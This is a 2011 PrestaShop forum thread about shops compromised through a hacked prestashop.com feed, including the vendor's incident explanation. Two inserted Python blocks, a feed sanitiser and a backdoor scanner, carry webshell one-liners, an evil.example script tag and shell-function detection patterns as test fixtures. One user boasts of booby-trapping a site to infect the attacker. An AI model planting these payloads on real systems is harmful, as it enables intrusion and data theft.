PrestaShop Forum

Footer.tpl vulnerability?

199 replies to this topic
#181
dazzza

    PrestaShop Apprentice

  • Members
  • PipPip
  • 89 posts
I've left the files in place on a project I'm working on for a client. Now if the hacker knows the admin address of the site & the login details & tries to access it, when they hit "log in" instead of logging in, it sends them a virus :)
E-Commerce & Online Shop Design I Want An Online Shop

#182
tobes

    PrestaShop Newbie

  • Members
  • Pip
  • 20 posts

chemapresta, on 24 August 2011 - 06:24 PM, said:

dazzza, on 24 August 2011 - 04:53 PM, said:

It seems to have only affected 1.4.3 & 1.4.4, so it must have been something that was added in 1.4.3:
"Add my IP"
or
Layered module

No, I'm using PS v1.4.1.0 and I am also affected.

1.4.2.5 for me on both my sites. I too am waiting to hear back from the support email address.
Freelance Web and Software developer.
http://tobestool.net

#183
Adalid_Negro

    PrestaShop Newbie

  • Members
  • Pip
  • 2 posts

dazzza, on 24 August 2011 - 06:41 PM, said:

I've left the files in place on a project I'm working on for a client. Now if the hacker knows the admin address of the site & the login details & tries to access it, when they hit "log in" instead of logging in, it sends them a virus :)

Just change the name of the administrator folder...


www.promutual-eat.com/s/

#184
dazzza

    PrestaShop Apprentice

  • Members
  • PipPip
  • 89 posts
My PrestaShop 1.5 test site seems to be unaffected so far. Checked footer.tpl, smarty files, modules, database & apache logs. Nothing.
E-Commerce & Online Shop Design I Want An Online Shop

#185
indus

    PrestaShop Apprentice

  • Members
  • PipPip
  • 328 posts
..........

#186
Mike Kranzler

    PrestaShop Superstar

  • PrestaTeam
  • 6082 posts
Hello everybody,
First of all, thank you for your information and knowledge as we worked on closing this hole.

We have officially secured this footer.tpl vulnerability and created a guide for quickly and easily fixing it in your shop.

You can find that guide here: http://www.prestasho...rity-procedure/

Again, thank you so much for your patience as we researched and applied this fix. The information you posted and emailed to us was invaluable when it came to speeding up the process.

If you have any additional questions, please do not hesitate to email us, but please be sure to try our suggestions here first.

Thanks again, and happy selling!

-Mike
Mike Kranzler, Community Manager, PrestaShop

Per PrestaShop's rules, requests for assistance sent via PM will not be answered. Please post them as a new thread directly to the forums for assistance.

#187
thehandlestudio

    PrestaShop Apprentice

  • Members
  • PipPip
  • 251 posts
Thank you Mike.

Regards,

Mark.
The Handle Studio
http://www.thehandlestudio.co.uk
Bringing Quality Direct To Your Door

Top Quality Hosting & Support
Use presta8656 coupon code and get 10% extra off


#188
plextor-online

    PrestaShop Newbie

  • Members
  • Pip
  • 1 posts
Thanks, PrestaShop team, for your hard work to fix this problem...

#189
geckoWebdesign

    PrestaShop Newbie

  • Members
  • Pip
  • 9 posts
Thank you ! Merci !
> Prestashop 1.4.6.2 <

#190
fireman28

    PrestaShop Apprentice

  • Members
  • PipPip
  • 31 posts
Thanks!! My Avast Antivirus has been giving warnings for a couple of weeks, and it is now that I realise what was going on. Won't ignore it again!!

I thought I had messed my Theme yesterday when all carousels and a slider went mad.

I wonder why a news service was capable of giving access to download files and who knows what else... perhaps we should be allowed to opt out in the future? Apart from money, we are losing credibility with our customers.

Does anybody know what the intention of such a hack was? What did the injected code do?

I thank again for everybody's efforts to bring this into control

Al

#191
PurpleEdge

    PrestaShop Apprentice

  • Members
  • PipPip
  • 54 posts

phrasespot, on 24 August 2011 - 03:15 PM, said:

Quote

if prestashop.com is infected, maybe the problem comes from the back office, which contacts some of PrestaShop's URLs.

This is actually not a bad assessment as to what may have been wrong, seeing the prevalence of the localhost infections.

Even if it was not, there are at least half a dozen places in the code where content from prestashop.com is pulled, and every single installation out there is at the mercy of the security of prestashop.com and its subdomains.

I understand the wish to collect stats/referrer points/affiliate credits etc., but PrestaShop should seriously reconsider including code that pulls stuff from other domains, including their own. Any security-conscious admin removes those sections from the code as soon as it is installed anyway. The alternative is that a situation like this one may arise at any time.

Just my two cents.

I agree 100% - this is a perfect example of the risk. Contacting head office for the latest news seems like a neat feature in a cms, but it is obviously a feature which requires constant vigilance.

Congratulations to PS for identifying the cause so quickly - now to prevent it happening again!
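The weakness phrasespot and PurpleEdge describe is the back office fetching content from prestashop.com and dropping it straight into the shop, which is also the design flaw Nebojsa confirms further down the thread. What the consuming side of such a feed should look like, as an added example (my own code, not PrestaShop's and not the patch the team shipped): the feed URL, the JSON field names, the size limits and the HMAC key are assumptions, and the two sample payloads are constructed. The shape is what matters: remote content is checked for origin and integrity, parsed as data against an allow-list, and escaped at the output boundary, so it can never reach a template as markup or PHP.

```python
"""
Hardened consumer for a vendor "news" feed pulled by a shop's back office.
Added example, not PrestaShop code: VENDOR_HOST, FEED_URL, FEED_KEY, the
field names and the size limits are assumptions for illustration.
"""
import hashlib
import hmac
import html
import json
from urllib.parse import urlparse

VENDOR_HOST = "www.prestashop.com"                 # assumed vendor host
FEED_URL = f"https://{VENDOR_HOST}/feed"           # assumed feed location
FEED_KEY = b"example-shared-key-not-a-real-one"    # assumed integrity key
MAX_BODY_BYTES = 64 * 1024
ALLOWED_FIELDS = {"title": 200, "summary": 1000, "link": 500}  # name -> max length


class FeedRejected(ValueError):
    """The remote payload is not what the back office expects; show nothing."""


def check_feed_url(url: str) -> None:
    """Pull only from the vendor host, and only over TLS."""
    parsed = urlparse(url)
    if parsed.scheme != "https" or parsed.hostname != VENDOR_HOST:
        raise FeedRejected(f"refusing feed source {url!r}")


def tag_for(body: bytes) -> str:
    """HMAC-SHA256 tag the vendor would send next to the body. A vendor
    broadcasting to many shops should use an asymmetric signature (Ed25519)
    instead; HMAC is used here only because it is in the standard library."""
    return hmac.new(FEED_KEY, body, hashlib.sha256).hexdigest()


def verify_tag(body: bytes, tag_hex: str) -> None:
    """Constant-time comparison so the check itself does not leak the tag."""
    if not hmac.compare_digest(tag_for(body), tag_hex):
        raise FeedRejected("integrity tag does not match body")


def parse_items(body: bytes) -> list:
    """Turn the raw body into plain-string items or reject it outright.
    Nothing from the body is ever included, eval'd or written to a .tpl."""
    if len(body) > MAX_BODY_BYTES:
        raise FeedRejected("feed body too large")
    try:
        data = json.loads(body.decode("utf-8"))
    except (UnicodeDecodeError, ValueError) as exc:
        raise FeedRejected(f"feed is not valid JSON: {exc}") from exc
    if not isinstance(data, list):
        raise FeedRejected("feed root must be a list of items")
    items = []
    for raw in data:
        if not isinstance(raw, dict) or set(raw) - set(ALLOWED_FIELDS):
            raise FeedRejected(f"unexpected item shape: {raw!r}")
        item = {}
        for field, max_len in ALLOWED_FIELDS.items():
            value = raw.get(field, "")
            if not isinstance(value, str) or len(value) > max_len:
                raise FeedRejected(f"bad value for field {field!r}")
            item[field] = value
        # Links may only point back at the vendor over https (no javascript: etc.).
        if item["link"] and not item["link"].startswith(f"https://{VENDOR_HOST}/"):
            raise FeedRejected(f"link outside vendor host: {item['link']!r}")
        items.append(item)
    return items


def render_news(items: list) -> str:
    """Escape at the output boundary: feed text is data, never markup."""
    rows = []
    for item in items:
        esc = {k: html.escape(v, quote=True) for k, v in item.items()}
        rows.append(f'<li><a href="{esc["link"]}">{esc["title"]}</a> {esc["summary"]}</li>')
    return "<ul>\n" + "\n".join(rows) + "\n</ul>"


def fetch_and_render(url: str, body: bytes, tag_hex: str) -> str:
    """Whole pipeline; body and tag_hex stand in for the HTTP response so
    the example runs offline."""
    check_feed_url(url)
    verify_tag(body, tag_hex)
    return render_news(parse_items(body))


def rejects(url: str, body: bytes, tag_hex: str) -> bool:
    """True if the pipeline refuses this input."""
    try:
        fetch_and_render(url, body, tag_hex)
    except FeedRejected:
        return True
    return False


# Constructed sample payloads, not real prestashop.com content.
GOOD_BODY = json.dumps([{"title": "PrestaShop 1.4.4 released", "summary": "Bug fixes",
                         "link": f"https://{VENDOR_HOST}/news/"}]).encode()
# What a compromised vendor site could serve: script for the page, PHP for the .tpl.
EVIL_BODY = json.dumps([{"title": '<script src="http://evil.example/x.js"></script>',
                         "summary": "{php}eval($_GET['c']);{/php}", "link": ""}]).encode()

if __name__ == "__main__":
    print(fetch_and_render(FEED_URL, GOOD_BODY, tag_for(GOOD_BODY)))
    # Even with a valid tag, hostile text comes out as inert escaped data.
    print(fetch_and_render(FEED_URL, EVIL_BODY, tag_for(EVIL_BODY)))
    print(rejects("http://www.prestashop.com/feed", GOOD_BODY, tag_for(GOOD_BODY)))
```

Run it and the hostile payload prints as escaped text. Note that the integrity tag only protects the transport: if the vendor site itself is compromised, the attacker holds the signing material too, which is why the allow-list parse and the output escaping are the layers that would have stopped a payload like the one described in this thread.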

#192
PurpleEdge

    PrestaShop Apprentice

  • Members
  • PipPip
  • 54 posts

Julien Breux, on 24 August 2011 - 04:57 PM, said:

It's just a little tool to help you.

https://github.com/jbreux/psauditor/

Hi Julien,

Can you please post a little bit more information about what this is and how to use it?

#193
feltu

    PrestaShop Newbie

  • Members
  • Pip
  • 4 posts
Dear PrestaShop Team,

Thank you for fixing the problem. The hack has cost us a lot of trouble on our 2 PrestaShop sites.

I need to know some extra information.

- Is version 1.4.4 safe to upgrade to?
- Will there be a new 1.4.x upgrade coming soon that covers this problem?
- Are we still safe to use the upload function from the contact form after applying the hotfix patch?
- Is there any chance that the password that we entered under the PayPal module has been sent to the hacker too?
- Is the email / personal info from the customer database being sent to the hacker?

We need to know the answers to the above urgently.

Thank you,
Cyril

#194
Takada

    PrestaShop Newbie

  • Members
  • Pip
  • 3 posts
Hello,

Something's missing: what is the risk for people who were infected on their local install? There is often no password for MySQL there...

#195
goodboy88

    PrestaShop Apprentice

  • Members
  • PipPip
  • 57 posts
I got infected too.

How can they upload or inject that code on my server when it is password protected? Does anyone know?

#196
makaraci

    PrestaShop Apprentice

  • Members
  • PipPip
  • 277 posts
Hi guys, I use version 1.3.1 of PrestaShop. I wonder if my site may be infected?
PrestaShop ver: 1.3.1

#197
Carl Favre

    Community Addict

  • PrestaTeam
  • 3463 posts
Hi makaraci,

It only concerns 1.4.x versions of PrestaShop.
Carl Favre, Community Manager, PrestaShop

#198
makaraci

    PrestaShop Apprentice

  • Members
  • PipPip
  • 277 posts

Carl Favre, on 25 August 2011 - 10:32 AM, said:

Hi makaraci,

It only concerns 1.4.x versions of PrestaShop.

Thanks Carl. I'm relaxed.
PrestaShop ver: 1.3.1

#199
Nebojsa Stojanovic

    Advanced Member

  • Members
  • Pip
  • 10 posts
Hi everybody,

First of all, I want to thank the PrestaTeam and the Community who were able to mobilize yesterday to correct the problem in just a few short hours.
I took the time to read each and every one of your posts, and I want to bring you as much information as possible to all your questions.

  • As soon as we became aware of the fault, we began by searching for its origin. We contacted several storefront owners who had found the problem; they gave us access, and together we tried to reproduce it on multiple machines in-house. We identified several possibilities:
    • A security vulnerability in the PrestaShop software that allowed the injection of malicious script into the shops.
    • A trojan that modifies the script before it is sent over FTP.
    • A trojan recovering FTP access and allowing another script to change the solution.
    • A security vulnerability in the software on the servers.
    And we finally managed to find the answer: the issue was with our website, www.prestashop.com.
    So we started by correcting the problem on prestashop.com, blocking the attack, and then we split the team in three:
    • A team to analyze more precisely what the script actually was, to assess the damage;
    • A team to create the sets and test them on several affected shops;
    • Another team responsible for verifying the PrestaShop server in depth, locking the server down and tracing the hack back to its origin to recover as much information as possible so that we can file an official report.
  • Yes, www.PrestaShop.com has been compromised, allowing an attacker to inject a script into the site and, as a result, another script into the remote stores.
  • This "loophole" exists because the software does not verify information coming from our own site. This design flaw is fixed with the patch that we provided you yesterday. This patch fixes the problem and protects your store from future attacks.
  • The software is completely secure as I am writing this, and the malicious script was offset yesterday afternoon around 7:00 a.m. Eastern Time.
  • The consequences for the affected shops are:
    • The script got your database access details and the "Employees" table and sent them by mail to an anonymous address, which is why we have asked you to change the password for your database and the passwords of all your employees in the back office of your store.
    • The script added several points of entry ("backdoors") in the download and upload directories, to browse the directory of your store; these scripts are deleted by the patch.
    • The script removed the directory tools/smarty_v2; this directory is recreated by the patch.
    • The direct consequence is, for now, a temporary suspension of your site until the security patches are applied.
  • What to do:
    • It is essential to apply the security patch quickly if you have been affected, because your data is still vulnerable;
    • If you have not been affected, you should apply the security patch as a preventative measure.
The whole PrestaShop team is listening to you and we are at your disposal for any questions. We are actively working to respond to you individually today to help resolve any problems.
Yours,
Nebojsa Stojanovic, Chief Technology Officer @ PrestaShop
@Nebojsa31
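A quick offline triage of the indicators Nebojsa lists (backdoor scripts dropped in the download and upload directories, a deleted tools/smarty_v2, and the injected footer.tpl the thread is named after), as an added example. This is my own script, not the official patch or security procedure: the directory layout is the stock 1.4 one, the webshell regexes are generic markers rather than signatures of this particular payload, and the shop it scans is a fixture constructed in a temporary directory.

```python
"""
Offline triage for a PrestaShop 1.4 tree against the indicators reported in
this thread. Added example, not the official fix: paths assume the stock
layout and the regexes are generic webshell markers, not the real payload.
"""
import re
import tempfile
from pathlib import Path

# Web-server-writable directories where the thread reports backdoors.
WRITABLE_DIRS = ("upload", "download")
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
PHP_OPEN = re.compile(rb"<\?(?:php|=)", re.IGNORECASE)
# Generic webshell markers (eval/base64/exec family), not this payload's signature.
SHELL_MARKERS = re.compile(
    rb"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open|"
    rb"base64_decode|gzinflate|str_rot13)\s*\(", re.IGNORECASE)
# Things that have no business in a theme footer: a script loaded from another
# host, a Smarty 2 {php} block, or any of the shell markers above.
FOOTER_MARKERS = (
    re.compile(rb"<script[^>]*\ssrc\s*=\s*[\"']?(?:https?:)?//", re.IGNORECASE),
    re.compile(rb"\{php\}", re.IGNORECASE),
    SHELL_MARKERS,
)


def scan_writable_dirs(root: Path) -> list:
    """Flag scripts in upload/ and download/. Every PrestaShop directory ships
    a stock index.php redirect stub, so that name is only flagged when it
    contains shell markers; diff it against a clean copy regardless."""
    findings = []
    for d in WRITABLE_DIRS:
        base = root / d
        if not base.is_dir():
            continue
        for path in base.rglob("*"):
            if not path.is_file():
                continue
            rel = path.relative_to(root)
            head = path.read_bytes()[:65536]
            if path.suffix.lower() in SCRIPT_EXTS:
                if path.name != "index.php":
                    findings.append(f"script dropped in {d}/: {rel}")
                elif SHELL_MARKERS.search(head):
                    findings.append(f"shell markers in {rel}")
            elif PHP_OPEN.search(head):
                findings.append(f"PHP code hidden in non-PHP file: {rel}")
    return findings


def check_smarty_dir(root: Path) -> list:
    """The payload is reported to delete tools/smarty_v2."""
    return [] if (root / "tools" / "smarty_v2").is_dir() else ["tools/smarty_v2 is missing"]


def scan_footers(root: Path) -> list:
    """Report the first hit of each marker in every theme's footer.tpl."""
    findings = []
    for tpl in sorted((root / "themes").glob("*/footer.tpl")):
        data = tpl.read_bytes()
        for marker in FOOTER_MARKERS:
            m = marker.search(data)
            if m:
                line = data[:m.start()].count(b"\n") + 1
                findings.append(f"{tpl.relative_to(root)}:{line}: {m.group(0)[:60]!r}")
    return findings


def audit(shop_root) -> list:
    root = Path(shop_root)
    return scan_writable_dirs(root) + check_smarty_dir(root) + scan_footers(root)


def build_sample_shop(shop_root) -> Path:
    """Constructed fixture, not a real compromised shop: an external script in
    footer.tpl, a clean stock index.php stub, a dropped shell, PHP hidden in
    a .jpg, and no tools/smarty_v2."""
    root = Path(shop_root)
    theme = root / "themes" / "prestashop"
    theme.mkdir(parents=True)
    (theme / "footer.tpl").write_text(
        '<div id="footer">{$HOOK_FOOTER}</div>\n'
        '<script type="text/javascript" src="http://example.invalid/s.js"></script>\n')
    (root / "upload").mkdir()
    (root / "upload" / "index.php").write_text('<?php header("Location: ../"); exit; ?>')
    (root / "upload" / "cache.php").write_text("<?php eval(base64_decode($_POST['c'])); ?>")
    (root / "download").mkdir()
    (root / "download" / "img.jpg").write_bytes(b"\xff\xd8\xff<?php system($_GET['x']); ?>")
    (root / "tools").mkdir()  # smarty_v2 deliberately absent
    return root


def run_sample_audit() -> list:
    """Build the fixture in a temp dir, audit it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit(build_sample_shop(tmp))


if __name__ == "__main__":
    for finding in run_sample_audit():
        print(finding)
```

Point audit() at a real shop root instead of the fixture. Treat hits as leads to review by hand, and for index.php stubs and footer.tpl diff against a clean copy of the same version rather than trusting the regexes. It cannot tell you whether the Employees table was already mailed out, so the database and back-office password changes Nebojsa asks for still apply even when the scan comes back clean.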

#200
Mike Kranzler

    PrestaShop Superstar

  • PrestaTeam
  • 6082 posts
Thank you Nebojsa, I know you and the rest of the team have worked very hard on this. I am going to close this thread, but for any additional questions or comments you may have, please visit the thread where we have published the fix, which you can find here.

-Mike
Mike Kranzler, Community Manager, PrestaShop

Per PrestaShop's rules, requests for assistance sent via PM will not be answered. Please post them as a new thread directly to the forums for assistance.